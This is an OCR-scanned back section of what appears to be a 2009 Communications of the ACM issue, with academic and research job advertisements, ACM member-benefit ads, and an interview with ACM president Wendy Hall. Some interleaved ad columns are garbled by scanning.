OPPORTUNITIES 


How to Submit a Classified Line Ad: Send an e-mail to ae-mmediasales@ 
acm.org. Please include text, and indicate the issue/or issues where the 
ad will appear, and a contact name and number. 


Estimates: An insertion order will then be e-mailed back to you. The ad 
will by typeset according to CACM guidelines. NO PROOFS can be sent. 
Classified line ads are NOT commissionable. 


Rates: $325.00 for six lines of text, 40 characters per line. $32.50 for each 
additional line after the first six. The MINIMUM is six lines. 


Deadlines: Five weeks prior to the publication date of the issue (which is 
the first of every month). Latest deadlines: 
http://www.acm.org/publications 


Career Opportunities Online: Classified and recruitment display ads 
receive a free duplicate listing on our website at: 
http://campus.acm.org/careercenter 


Ads are listed for a period of 30 days. 
For More Information Contact: 
ACM Media Sales 
at 212-626-0654 or 
acmmediasales@acm.org 
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Internet2 
Chief Technology Officer 


Internet2 is the foremost U.S. Higher Education 
advanced networking consortium. Led by the 
research and education community since 1996, 
Internet2 promotes the missions of its mem- 
bers by providing both leading-edge network 
capabilities and unique partnership opportu- 
nities that together facilitate the development, 
deployment and use of revolutionary Internet 
technologies. Internet2 has an opportunity for a 
Chief Technology Officer (CTO) for our Research 
& Development area. The CTO reports directly to 
the Chief Executive Officer and directs the over- 
all advanced technology program and activities 
of Internet2. Visit our website at www.internet2. 
edu/about/staff for complete details of this and 
other positions. 

Send curriculum vitae in electronic mail for- 
mat to: jobs@internet2.edu 


Internet2 

Attn: 08-073 

1000 Oakbrook, Suite 300 
Ann Arbor, MI 48104 


Internet2 is a 501(C)3 not-for-profit organiza- 
tion and an equal opportunity employer. 


University Corporation for 
Atmospheric Research 
Scientist I 


The Computational and Information Systems 
Laboratory (CISL) at the National Center for At- 
mospheric Research (NCAR) in Boulder, Colora- 
do, seeks an individual to conduct research and 
development in the fields of computational sci- 
ence, scientific computing, high-performance 
computing, and computing systems as it relates 
to NCAR's mission. We are particularly inter- 
ested in scientists with experience and expertise 
in the following areas: technologies and tech- 
niques for petascale computing, massively par- 
allel algorithms, optimization for multi/many- 
core systems, accelerator technologies (e.g., 
GPGPUs and FGPAs), and software engineering 
for parallel applications. 

Initial consideration will be given to applica- 
tions received prior to Friday, March 13, 2009. 
Thereafter, applications will be reviewed on an 
as-needed basis. Apply online at www.ucar.edu 
(reference job #9028). We value diversity. 

AA/EOE 

Application materials should include: A state- 
ment of research interest; a Curriculum Vitae 
(CV); and a list of referees from whom we may ex- 
pect letters of recommendation to be sent. Please 
ask referees to submit their letters to: SCIO9T- 
DD@ucar.edu 

View detailed job description at www.ucar.edu 
at the Jobs & Opportunities/Careers @ UCAR link. 
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aw Windows 


Announcement of an open position at the 


. ei S Faculty of Informatics, 
Windows Kernel Source and Curriculum Materials for Vienna iniversity of Technology, Austria 


Academic Teaching and Research. Full Professor (tenured) 
in 


The Windows Academic Program from Microsoft» provides the materials you 
need to integrate Windows kernel technology into the teaching and research Parallel Computing 


Ot opreniiig sysverns: The successful candidate will establish her/his 
own group conducting research and teaching 
The program includes: in the area of parallel computing. Research and 
: teaching experiences are expected to include 

several of the following topics: 
+ Windows Research Kernel (WRK): Sources to build and experiment with a e The design, analysis and implementation of 
fully-functional version of the Windows kernel for x86 and x64 platforms, as efficient (including general purpose) parallel 


well as the original design documents for Windows NT. Paani 


The design and optimization of effective pro- 
gramming languages, models and methods 
: : ; ; : for parallel programs. 

of the design and implementation of the Windows kernel, following the The design and analysis of parallel and high 


ACM/IEEE-CS OS Body of Knowledge, and including labs, exercises, quiz performance computing systems, such as 


* Curriculum Resource Kit (CRK): PowerPointw slides presenting the details 


SMP, cluster, and multi-core systems. 

The development of algorithms and environ- 
* ProjectOZ: An OS project environment based on the SPACE kernel-less OS Laslett pelale ec Ustoha ate: muilrcoe 
project at UC Santa Barbara, allowing students to develop OS kernel projects Integration of parallel computing systems to 
in user-mode modern infrastructures such as grids and clouds. 
; Programming environments (including tools 
for semi- or automatic parallelization) for 
These materials are available at no cost, but only for non-commercial use by universities. efficient development of parallel programs. 
The applicant should have demonstrated her/his 
ability to apply the above methods in various 
areas of Computational Science and Engineering 
such as e-science and simulation. 


questions, and links to the relevant sources. 


A more detailed announcement and information 
on how to apply can be found at 
http://www.informatics.tuwien.ac.at/PC.pdf 


Application deadline: June 15, 2009 


For more information, visit www.microsoft.com/WindowsAcademic 


or e-mail compsci@microsoft.com. 


ALBERT-LUDWIGS- 
UNIVERSITAT FREIBURG 


The Faculty of Applied Sciences of the University of Freiburg, with its Departments of 
Computer Science and Microsystems Engineering, invites applications for the position of a 


Full Professor (W3) in Computer Science 


The successful candidate will be expected to establish a comprehensive research and 
teaching program in the area of pattern recognition and image processing. In addition 
she/he is expected to participate in university-wide research programs, such as the 
Excellence Cluster BIOSS — Centre for Biological Signaling Studies. 


The University of Freiburg aims to increase the representation of women in research and 
teaching, and therefore expressly encourages women to apply for the post. Information 
about the Department of Computer Science can be obtained from www.informatik. 
uni-freiburg.de. 


Applications, including a curriculum vitae, publications list and statement of research 
interests should be sent by April 30, 2009 to the Dean of the Faculty of Applied Sciences, 
University of Freiburg, Georges-K6hler-Allee 101, 79110 Freiburg, Germany (www.faw. 
uni-freiburg.de). Applicants should request an application form from the Dean’s office by 
emailing to: dekanat@faw.uni-freiburg.de 
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AQ THE HONG KONG 
Lee POLYTECHNIC UNIVERSITY = = = 
O nea 


The Hong Kong Polytechnic University is the largest government-funded tertiary institution in Hong Kong, with a total student headcount of about 28,090, of which 14,260 are full- 
time students, 10,050 are part-time students, and 3,780 are mixed-mode students. It offers programmes at Doctorate, Master’ s, Bachelor’ s degrees and Higher Diploma levels. The 
University has 27 academic departments and units grouped under six faculties, as well as 2 independent schools and 2 independent research institutes. It has a full-time academic 
staff strength of around 1,300. The total consolidated expenditure budget of the University is in excess of HK$4 billion per year. 


SCHOOL OF DESIGN 
Professor / Associate Professor / Assistant Professor in Digital Media 


lhe School of Design, as one of the top design schools in the world, is at the forefront of applying Asian innovation to global opportunities. The School is committed to sustaining 
excellence in design education, practice, consulting and research; to harnessing the legacy and dynamism of Asian cultures in creating solutions for human needs; and to creating 
strat 


gic models for products, brands, and systems in local and global markets. The School offers a wide range of programmes at sub-degree, undergraduate and postgraduate levels 
in areas of Advertising Design, Digital Media, Environment and Interior Design, Industrial and Product Design, Visual Communication Di 
Entertainment, Interaction Design, Design Strategies and Practices. Its research and consultancy work are of an applied nature relevant to industr 


needs. Please visit the website at http://www.sd.polyu.edu.hk for more information about the School. 


gn, Multimedia and Digital 
1, commercial and community 


he School is now inviting applications for a Professor / Associate Professor / Assistant Professor in Digital Media. The appointee will be in charge of the Multimedia Innovation 
Centre (MIC) at the School. MIC is an interdisciplinary centre dedicated to research, teaching, training, and outreach activities in the areas of Digital Media, Entertainment 
echnology, and Video Games. MIC's mission is to advance understanding in the design and development of new products and services in this high-innovation area. Drawing from 
the Centre’s interdisciplinary resources, the appointee will be involved in all aspects of initiating and orchestrating the development of the Centre. 


‘he appointee will be required to (a) oversee the mission, staffing matters and budget of MIC; (b) oversee the Master of Science in Multimedia and Entertainment Technology 
Programme and develop new programmes as opportunities arise; (c) contribute to teaching at the postgraduate and/or undergraduate levels in the area of Digital Media; (d) network 
with other institutes and experts to establish important partnerships, 


share information, and expand research and outreach endeavours; (e) cultivate collaboration with other 
disciplines, Schools and industry partners to develop new research initiatives, and (f) provide guidance on the application of multimedia technologies and design principles to 
education, research, and interdisciplinary projects. 


Applicants should have (a) a relevant PhD degree plus at least five years’ teaching or relevant working experience, OR a relevant master’s degree plus at least eight years’ teaching or 
relevant working experience preferably in university administration and leadership experience in the areas of Multimedia, Entertainment Technology, Digital Media Design or related 
disciplines; (b) a distinguished record of professional, scholarly and/or academic activities and significant background and record in scholarship and publication in Digital Media; (c) 
qualities of creativity, initiative and leadership; (d) a strong commitment to excellence in teaching, research and professional service. 

Applicants with less experience may be considered for appointment at the level of Assistant Professor. The job duty requirements and expectations would be in line with the 
appointed grade. Applicants should submit a letter of interest and their portfolios including copies of 10 samples of their work in hardcopy, CD or memory stick format with a brief 
description of the work together with the completed application. 

Remuneration and Conditions of Service 


Salary offered will be commensurate with qualifications and experience. Initial appointment will be made on a fixed-term gratuity-bearing contract. Re-engagement thereafter is 
subject to mutual agreement. Remuneration package will be highly competitive. Applicants should state their current and expected salary in the application. 

Application 

Please submit application form via email to hrstaff(@polyu.eduhk; by fax at (852) 2764 3374; or by mail to Human Resources Office, 13/F, Li Ka Shing Tower, The Hong Kong 
Polytechnic University, Hung Hom, Kowloon, Hong Kong. If you would like to provide a separate curriculum vitae, please still complete the application form which will help 
speed up the recruitment process. Application forms can be obtained via the above channels or downloaded fromhttp://www.polyu.edu.hk/hro/job.htm. Recruitment will continue 


until the position is filled. Details of the University’ s Personal Information Collection Statement for recruitment can be found at http://www.polyu.edu.hk/hro/jobpics.htum. 


NANYANG 
UNIVERSITY 


School of Physical and Mathematical Sciences 


The Division of Mathematical Sciences (http://www.spms.ntu.edu.sg/mas) of the Nanyang Technological University (NTU), Singapore, 
is looking to add to its tenure-track faculty at all ranks. While we encourage strong candidates from all areas of Theoretical Computer 
Science to apply, we are particularly interested in the following areas: 


* Computational Geometry + Discrete Algorithms * Computational Number Theory 
+ Network and Combinatorial Optimization * Computational Complexity 


NTU is a research university, with low teaching loads, excellent facilities, ample research funding and support for conference travel. 
The Division of Mathematical Sciences consists of active and talented faculty members working in a variety of areas. Its student body 
includes some of the best in the region. It offers undergraduate programs in mathematical sciences and mathematics & economics, 


and a graduate program awarding Masters and PhD degrees. Salary and benefits are competitive with the top universities 
around the world. 


We seek people with excellent achievements in both research and teaching. Interested candidates are requested to send the following 
material to MASrecruit@ntu.edu.sg 


« Application Letter * Research Statement « Names of at least three referees 
* Curriculum Vitae * Teaching Statement 


Apart from the above faculty positions, there are also 16 three-to-five year research fellowships (from fresh post-docs to senior 
research fellows) available. Applicants with a strong background in one of the areas of Coding/Cryptography and Computational 
Mathematics/Image Processing/Computer Vision are encouraged to send their application letters, detailed CVs and the names/contact 
emails of two references to cerg_postdoc@ntu.edu.sg (for Coding and Cryptography) or compmath@ntu.edu.sg 
(for Computational Mathematics/Image Processing/Computer Vision). In addition, three to five postdoc positions in Algorithmic Game 
Theory/Computational Social Choice are available. Interested applicants should send their detailed CVs, a research statement, and contact 
details of at least three referees to Prof. Elkind (eelkind@ntu.edu.sg). 
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Group Term Life Insurance™ 


10- or 20-Year Group Term 
Life Insurance” 


me Insurance* 


Who has time to think 
about insurance? 


Today, it’s likely you’re busier than ever. So, the last thing you probably have on your mind is 
whether or not you are properly insured. 


But in about the same time it takes to enjoy a cup of coffee, you can learn more about your 
ACM-sponsored group insurance program — a special member benefit that can help provide 
you financial security at economical group rates. 


Take just a few minutes today to make sure you’re properly insured. 


Call Marsh Affinity Group Services at 1-800-503-9230 or visit www.personal-plans.com/acm. 


3132851 35648 (7/07) © Seabury & Smith, Inc. 2007 

The plans are subject to the terms, conditions, exclusions and limitations of the group policy. For costs and complete details of coverage, 
contact the plan administrator. Coverage may vary and may not be available in all states. 

*Underwritten by The United States Life Insurance Company in the City of New York, a member company of American International Group, Inc 


**Underwritten by American General Assurance Company, a member company of American International Group, Inc. M A R S H 


***Coverage is available through Assurant Health and underwritten by Time Insurance Company. Affinity Group Services 


AG5217 a service of Seabury & Smit 


[CONTINUED FROM P. 112] our _ first 
meeting this February, in London. 
There are already lots of different com- 
puter societies in Europe, and they doa 
lot to energize and support the research 
base. We're trying to find out what we 
could do to help and collaborate. 


What’s your time frame for all 

of this? 

We'd like to see the councils for China, 
India, and Europe set up and running 
their own meetings by the end of finan- 
cial year ‘09, which technically finishes 
inJune. We’re also planning more events 
like the educational summit in China. 
Hopefully, we’ll have something in In- 
dia in 2010, and we’re looking to have an 
event in Europe, as well. Then we’ve got 
to think about Central and South Ameri- 
ca, and Africa—it’s a big world. 


You've also been talking about 
growing ACM’s membership. 

ACM has had a steady growth, and we 
reckon we can get to an even 100,000. 
But when you think about it, there 
are hundreds of thousands of peo- 
ple—millions—who work in this area 


across the world. So we’ve just started | 


“What would it mean 
if we tried to double 
our membership? 
How would it 

change ACM?” 


a debate, which we’re going to run this 
year: What would it mean if we tried to 
double our membership? How would it 
change ACM? 


Sounds like there’s a lot to be done. | 


There is a lot of responsibility, but it’s 
also great fun. I’ve always enjoyed work- 


ing with and for ACM, and because of | 


its international role you feel that you 
can really have an impact. 


What else is on the agenda? 
The other big part of our agenda is im- 
proving the image of the field and the 


health of the discipline. This is all in | 


Take Advantage of 
ACM's Lifetime Membership Plan! 


last byte 


collaboration with other organizations, 
like the National Science Foundation 


| and members of the media. We've seen 


a dramatic drop in the numbers of peo- 
ple interested in careers in computing, 
and we’re working on several projects to 


_ help turn this around. 


Such as? 

Public broadcaster WGBH, in Boston, 
does a lot to encourage young people 
to go into science and engineering. So 
we're working with them to look partic- 
ularly at Latina and African-American 
girls. The Educational Policies Commit- 
tee is also looking at ways to move com- 
puting and computer science into the 
mainstream of policy thinking. 


Ona more personal note, you 

were recently honored as Dame 
Commander. How did that feel? 

It is, of course, a huge honor, and thrill- 
ing for me and my family. But I think it’s 
also good for the computing communi- 


_ ty to have one of its own recognized in 


this way. 


Leah Hoffmann is Brooklyn-based technology writer. 
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¢ ACM Professional Members can enjoy the convenience of making a single payment for their 
entire tenure as an ACM Member, and also be protected from future price increases by 
taking advantage of ACM's Lifetime Membership option. 


ACM Lifetime Membership dues may be tax deductible under certain circumstances, so 
becoming a Lifetime Member can have additional advantages if you act before the end of 
2008. (Please consult with your tax advisor.) 


Lifetime Members receive a certificate of recognition suitable for framing, and enjoy all of 
the benefits of ACM Professional Membership. 


Learn more and apply at: 
http://www.acm.org/life 
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Our Dame Commander 


Wendy Hall discusses her plans to increase ACM’s membership 
and to create task forces in China, India, and Europe. 


A PROFESSOR OF Computer science at the 
University of Southampton and the 


winner of numerous awards and hon- | 


ors, such as her recent appointment as 
Dame Commander of the Order of the 


British Empire, Wendy Hall was elected | 


president of ACM in July 2008. 


You're the third female president 

of ACM, and the first non-North 
American president. How does 

that feel? 

For me, it’s more exciting that I’m the 
first non-North American president. A 
lot of times you don't like to do things 
just because you’re a woman—you 
want to do stuff because you're the best 
person to do it, in the whole competi- 
tive field. 


What are your plans for ACM? 

ACM is in a good position, with 92,000 
members and counting, and we had a 
fantastic year last year. But we mustn’t 
be complacent. Broadly speaking, I 
want more people to join ACM, I want 


more women to join ACM. ACM is a | 


U.S.-based organization, but it reaches 
out to the whole world through its pub- 
lications and conferences. 


What will you be doing to support 
those international members? 

We’re developing a series of task forces 
to explore what ACM can do in particu- 
lar areas of the world—China, India, Eu- 
rope. We need to ask: What can we do to 
support each of these cultures in their 
own context? 


How will the task forces operate? 
The task forces are geographically 
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based, and [ACM CEO] John White is 
working very hard to get a good quality, 
diverse membership. The idea is that we 
start off with a task force, and as it ma- 
tures, it will become a council in that re- 
gion. We also want the task force chairs 
to come to New York and be a part of our 
discussions. It would be hopeless if it 
were always done at a distance. 


What’s been accomplished thus far? 
In November, we held a summit largely 
aimed at Chinese educators. It was very 
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successful, but we want to build on it. 
There’s a huge amount of computing 
activity in China. At the moment our 
work is in Beijing—and we’ll arrange a 
meeting of the ACM China Council later 
in the year—but we must expand it to 
Shanghai and Hong Kong and other re- 
gions. We also have an embryonic task 
force in India, which held its first meet- 
ing in early February. 


And in Europe? 


We, too, held [CONTINUED ON P. 111] 


BY JON BANFIELD 


PHOTOGRE 


CONNECT WITH OUR 
COMMUNITY OF EXPERTS. 


www.reviews.com 
Association for 
scebcameel abebiats They'll help you find the best new books 
Reviews.com and articles in computing. 


Lomputing Reviews is a collaboration between the ACM and Reviews.com. 


92009 


NEW WORLD 


Join us in Boston, MA for the 27th Annual CHI Conference, the premier 
international forum for all aspects of human-computer interaction. 
Computing is reaching into all parts of modern life. CHI 2009 brings together 
people working on the design, evaluation, implementation, and study of interac- 
tive computing systems for human use. CHI serves as a forum for the exchange 
of ideas among computer scientists, human factors scientists, psychologists, 


social scientists, system designers, usability professionals, and end users. 


www.chi2009.org 
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